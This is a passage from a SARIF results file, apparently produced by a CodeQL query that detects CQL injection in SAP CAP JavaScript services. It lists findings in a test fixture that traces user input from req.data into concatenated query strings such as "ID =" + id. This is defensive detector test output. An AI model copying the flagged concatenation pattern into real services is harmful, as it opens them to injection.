}"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":535,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":537,"startColumn":52,"endColumn":54}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":537,"startColumn":43,"endColumn":54}},"message":{"text":"\"ID =\" + id"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":535,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":535,"startColumn":22,"endColumn":30}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":537,"startColumn":43,"endColumn":54}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":546,"startColumn":16,"endColumn":21}}}],"partialFingerprints":{"primaryLocationLineHash":"e46cd48130ebf859:1","primaryLocationStartColumnFingerprint":"7"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":543,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":543,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":543,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":544,"startColumn":56,"endColumn":58}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":544,"startColumn":48,"endColumn":58}},"message":{"text":"\"ID=\" + id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":544,"startColumn":21,"endColumn":59}},"message":{"text":"SELECT. ... \" + id)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":544,"startColumn":13,"endColumn":18}},"message":{"text":"query"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":546,"startColumn":16,"endColumn":21}},"message":{"text":"query"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":543,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":543,"startColumn":22,"endColumn":30}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":553,"startColumn":9,"endColumn":46}}}],"partialFingerprints":{"primaryLocationLineHash":"ecbeb50b953c6892:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":551,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":551,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":551,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":553,"startColumn":43,"endColumn":45}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":553,"startColumn":34,"endColumn":45}},"message":{"text":"\"ID =\" + id"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":551,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":551,"startColumn":22,"endColumn":30}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":553,"startColumn":34,"endColumn":45}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1).\nThis CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":567,"startColumn":9,"endColumn":79}}}],"partialFingerprints":{"primaryLocationLineHash":"558b998facd3da37:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":565,"startColumn":30,"endColumn":38}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":565,"startColumn":13,"endColumn":27}},"message":{"text":"{ id, amount }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":565,"startColumn":19,"endColumn":25}},"message":{"text":"amount"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":567,"startColumn":50,"endColumn":56}},"message":{"text":"amount"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":567,"startColumn":34,"endColumn":56}},"message":{"text":"\"col1 = ...  amount"}}}]}]},{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":565,"startColumn":30,"endColumn":38}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":565,"startColumn":13,"endColumn":27}},"message":{"text":"{ id, amount }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":565,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":567,"startColumn":76,"endColumn":78}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":567,"startColumn":64,"endColumn":78}},"message":{"text":"\"col1 = \" + id"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":565,"startColumn":30,"endColumn":38}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":565,"startColumn":30,"endColumn":38}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":567,"startColumn":34,"endColumn":56}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":567,"startColumn":64,"endColumn":78}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":588,"startColumn":9,"endColumn":48}}}],"partialFingerprints":{"primaryLocationLineHash":"91becd2fa07cdcc9:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":586,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":586,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":586,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":588,"startColumn":45,"endColumn":47}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":588,"startColumn":36,"endColumn":47}},"message":{"text":"\"ID =\" + id"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":586,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":586,"startColumn":22,"endColumn":30}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":588,"startColumn":36,"endColumn":47}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":597,"startColumn":16,"endColumn":21}}}],"partialFingerprints":{"primaryLocationLineHash":"fb574234cc9e3952:1","primaryLocationStartColumnFingerprint":"7"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":594,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":594,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":594,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":595,"startColumn":56,"endColumn":58}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":595,"startColumn":48,"endColumn":58}},"message":{"text":"\"ID=\" + id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":595,"startColumn":21,"endColumn":59}},"message":{"text":"SELECT. ... \" + id)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":595,"startColumn":13,"endColumn":18}},"message":{"text":"query"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":597,"startColumn":16,"endColumn":21}},"message":{"text":"query"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":594,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":594,"startColumn":22,"endColumn":30}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":604,"startColumn":9,"endColumn":46}}}],"partialFingerprints":{"primaryLocationLineHash":"ecbeb50b995e8367:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":602,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":602,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":602,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":604,"startColumn":43,"endColumn":45}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":604,"startColumn":34,"endColumn":45}},"message":{"text":"\"ID =\" + id"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":602,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":602,"startColumn":22,"endColumn":30}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":604,"startColumn":34,"endColumn":45}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1).\nThis CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":618,"startColumn":9,"endColumn":79}}}],"partialFingerprints":{"primaryLocationLineHash":"558b998facd3da37:2","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":616,"startColumn":30,"endColumn":38}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":616,"startColumn":13,"endColumn":27}},"message":{"text":"{ id, amount }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":616,"startColumn":19,"endColumn":25}},"message":{"text":"amount"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":618,"startColumn":50,"endColumn":56}},"message":{"text":"amount"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":618,"startColumn":34,"endColumn":56}},"message":{"text":"\"col1 = ...  amount"}}}]}]},{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":616,"startColumn":30,"endColumn":38}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":616,"startColumn":13,"endColumn":27}},"message":{"text":"{ id, amount }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":616,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":618,"startColumn":76,"endColumn":78}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":618,"startColumn":64,"endColumn":78}},"message":{"text":"\"col1 = \" + id"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":616,"startColumn":30,"endColumn":38}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":616,"startColumn":30,"endColumn":38}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":618,"startColumn":34,"endColumn":56}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":618,"startColumn":64,"endColumn":78}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":639,"startColumn":9,"endColumn":48}}}],"partialFingerprints":{"primaryLocationLineHash":"91becd2fa09975ba:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":637,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":637,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":637,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":639,"startColumn":45,"endColumn":47}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":639,"startColumn":36,"endColumn":47}},"message":{"text":"\"ID =\" + id"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":637,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":637,"startColumn":22,"endColumn":30}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":639,"startColumn":36,"endColumn":47}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":647,"startColumn":18,"endColumn":23}}}],"partialFingerprints":{"primaryLocationLineHash":"1e42917dcc40a599:1","primaryLocationStartColumnFingerprint":"11"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":645,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":645,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":645,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":646,"startColumn":56,"endColumn":58}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":646,"startColumn":48,"endColumn":58}},"message":{"text":"\"ID=\" + id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":646,"startColumn":21,"endColumn":59}},"message":{"text":"SELECT. ... \" + id)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":646,"startColumn":13,"endColumn":18}},"message":{"text":"query"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":647,"startColumn":18,"endColumn":23}},"message":{"text":"query"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":645,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":645,"startColumn":22,"endColumn":30}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided 